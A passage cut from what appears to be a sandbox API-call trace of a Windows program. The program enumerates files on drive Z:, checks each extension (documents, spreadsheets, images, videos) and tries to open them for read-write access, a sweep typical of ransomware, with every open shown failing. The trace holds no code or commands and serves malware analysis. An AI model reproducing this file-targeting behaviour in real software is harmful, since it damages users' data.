0xffffffff [0186.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.169] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tcambCkECjq.ods", cAlternateFileName="")) returned 1 [0186.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.169] PathFindExtensionW (pszPath="Z:\\tcambCkECjq.ods") returned=".ods" [0186.173] CreateFileW (lpFileName="Z:\\tcambCkECjq.ods" (normalized: "z:\\tcambckecjq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.175] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11a0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1WjGsbbxyz9w44lK.jpg", cAlternateFileName="")) returned 1 [0186.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.175] PathFindExtensionW (pszPath="Z:\\1WjGsbbxyz9w44lK.jpg") returned=".jpg" [0186.179] CreateFileW (lpFileName="Z:\\1WjGsbbxyz9w44lK.jpg" (normalized: "z:\\1wjgsbbxyz9w44lk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.180] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xad00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="85sWKB.jpg", cAlternateFileName="")) returned 1 [0186.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.180] PathFindExtensionW (pszPath="Z:\\85sWKB.jpg") returned=".jpg" [0186.185] CreateFileW (lpFileName="Z:\\85sWKB.jpg" (normalized: "z:\\85swkb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.186] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a5f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F01GLe.odt", cAlternateFileName="")) returned 1 [0186.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.186] PathFindExtensionW (pszPath="Z:\\F01GLe.odt") returned=".odt" [0186.191] CreateFileW (lpFileName="Z:\\F01GLe.odt" (normalized: "z:\\f01gle.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.192] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10636, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7wJ29fsIwS36l.ods", cAlternateFileName="")) returned 1 [0186.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.193] PathFindExtensionW (pszPath="Z:\\7wJ29fsIwS36l.ods") returned=".ods" [0186.198] CreateFileW (lpFileName="Z:\\7wJ29fsIwS36l.ods" (normalized: "z:\\7wj29fsiws36l.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.200] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x101cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bv3be5Un8YJj.avi", cAlternateFileName="")) returned 1 [0186.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.200] PathFindExtensionW (pszPath="Z:\\bv3be5Un8YJj.avi") returned=".avi" [0186.204] CreateFileW (lpFileName="Z:\\bv3be5Un8YJj.avi" (normalized: "z:\\bv3be5un8yjj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.205] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc2ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LLAm0.pps", cAlternateFileName="")) returned 1 [0186.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.205] PathFindExtensionW (pszPath="Z:\\LLAm0.pps") returned=".pps" [0186.209] CreateFileW (lpFileName="Z:\\LLAm0.pps" (normalized: "z:\\llam0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.211] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NnhUiKm1fKnUDbh8LQYp.mp4", cAlternateFileName="")) returned 1 [0186.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.211] PathFindExtensionW (pszPath="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4") returned=".mp4" [0186.215] CreateFileW (lpFileName="Z:\\NnhUiKm1fKnUDbh8LQYp.mp4" (normalized: "z:\\nnhuikm1fknudbh8lqyp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.217] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1769e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EqQ64IKq2Th.pptx", cAlternateFileName="")) returned 1 [0186.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.217] PathFindExtensionW (pszPath="Z:\\EqQ64IKq2Th.pptx") returned=".pptx" [0186.221] CreateFileW (lpFileName="Z:\\EqQ64IKq2Th.pptx" (normalized: "z:\\eqq64ikq2th.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.223] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x111e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WVJ9AocI35l55mCp.jpg", cAlternateFileName="")) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.223] PathFindExtensionW (pszPath="Z:\\WVJ9AocI35l55mCp.jpg") returned=".jpg" [0186.228] CreateFileW (lpFileName="Z:\\WVJ9AocI35l55mCp.jpg" (normalized: "z:\\wvj9aoci35l55mcp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.229] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf281, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kmB0a6WlogU.gif", cAlternateFileName="")) returned 1 [0186.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.230] PathFindExtensionW (pszPath="Z:\\kmB0a6WlogU.gif") returned=".gif" [0186.234] CreateFileW (lpFileName="Z:\\kmB0a6WlogU.gif" (normalized: "z:\\kmb0a6wlogu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.236] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb48c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7UtZQV2KEwEgGRw.csv", cAlternateFileName="")) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.236] PathFindExtensionW (pszPath="Z:\\G7UtZQV2KEwEgGRw.csv") returned=".csv" [0186.240] CreateFileW (lpFileName="Z:\\G7UtZQV2KEwEgGRw.csv" (normalized: "z:\\g7utzqv2keweggrw.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.242] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x164b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pLGCqUlBqdCyIjLjqV.doc", cAlternateFileName="")) returned 1 [0186.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.242] PathFindExtensionW (pszPath="Z:\\pLGCqUlBqdCyIjLjqV.doc") returned=".doc" [0186.247] CreateFileW (lpFileName="Z:\\pLGCqUlBqdCyIjLjqV.doc" (normalized: "z:\\plgcqulbqdcyijljqv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.248] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oq2biITomiSUVed.odt", cAlternateFileName="")) returned 1 [0186.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.248] PathFindExtensionW (pszPath="Z:\\Oq2biITomiSUVed.odt") returned=".odt" [0186.253] CreateFileW (lpFileName="Z:\\Oq2biITomiSUVed.odt" (normalized: "z:\\oq2biitomisuved.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.254] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="03oNIO07eJKfFtSq1le.pdf", cAlternateFileName="")) returned 1 [0186.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.255] PathFindExtensionW (pszPath="Z:\\03oNIO07eJKfFtSq1le.pdf") returned=".pdf" [0186.259] CreateFileW (lpFileName="Z:\\03oNIO07eJKfFtSq1le.pdf" (normalized: "z:\\03onio07ejkfftsq1le.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.263] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfa4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6dEvdGK0.pptx", cAlternateFileName="")) returned 1 [0186.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.263] PathFindExtensionW (pszPath="Z:\\s6dEvdGK0.pptx") returned=".pptx" [0186.269] CreateFileW (lpFileName="Z:\\s6dEvdGK0.pptx" (normalized: "z:\\s6devdgk0.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.270] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x79d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqAk5x9DCd1vbqL.xls", cAlternateFileName="")) returned 1 [0186.270] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.270] PathFindExtensionW (pszPath="Z:\\SqAk5x9DCd1vbqL.xls") returned=".xls" [0186.275] CreateFileW (lpFileName="Z:\\SqAk5x9DCd1vbqL.xls" (normalized: "z:\\sqak5x9dcd1vbql.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.276] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.276] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xff02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="les739ApbVb9h5NbQG.png", cAlternateFileName="")) returned 1 [0186.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.276] PathFindExtensionW (pszPath="Z:\\les739ApbVb9h5NbQG.png") returned=".png" [0186.282] CreateFileW (lpFileName="Z:\\les739ApbVb9h5NbQG.png" (normalized: "z:\\les739apbvb9h5nbqg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.283] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0c5f9ps.odt", cAlternateFileName="")) returned 1 [0186.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0186.283] PathFindExtensionW (pszPath="Z:\\0c5f9ps.odt") returned=".odt" [0186.288] CreateFileW (lpFileName="Z:\\0c5f9ps.odt" (normalized: "z:\\0c5f9ps.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0186.290] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CUAALsfvQ.odp", cAlternateFileName="")) returned 1 [0186.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.290] PathFindExtensionW (pszPath="Z:\\CUAALsfvQ.odp") returned=".odp" [0186.294] CreateFileW (lpFileName="Z:\\CUAALsfvQ.odp" (normalized: "z:\\cuaalsfvq.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.296] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x107bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IyGa2UNby.ots", cAlternateFileName="")) returned 1 [0186.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0186.296] PathFindExtensionW (pszPath="Z:\\IyGa2UNby.ots") returned=".ots" [0186.300] CreateFileW (lpFileName="Z:\\IyGa2UNby.ots" (normalized: "z:\\iyga2unby.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0186.302] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xce96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrdJUxDyhDG3y7Oab1mj.flv", cAlternateFileName="")) returned 1 [0186.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0186.302] PathFindExtensionW (pszPath="Z:\\NrdJUxDyhDG3y7Oab1mj.flv") returned=".flv" [0186.306] CreateFileW (lpFileName="Z:\\NrdJUxDyhDG3y7Oab1mj.flv" (normalized: "z:\\nrdjuxdyhdg3y7oab1mj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0186.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0186.307] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc9f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HwIsy.png", cAlternateFileName="")) returned 1 [0186.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 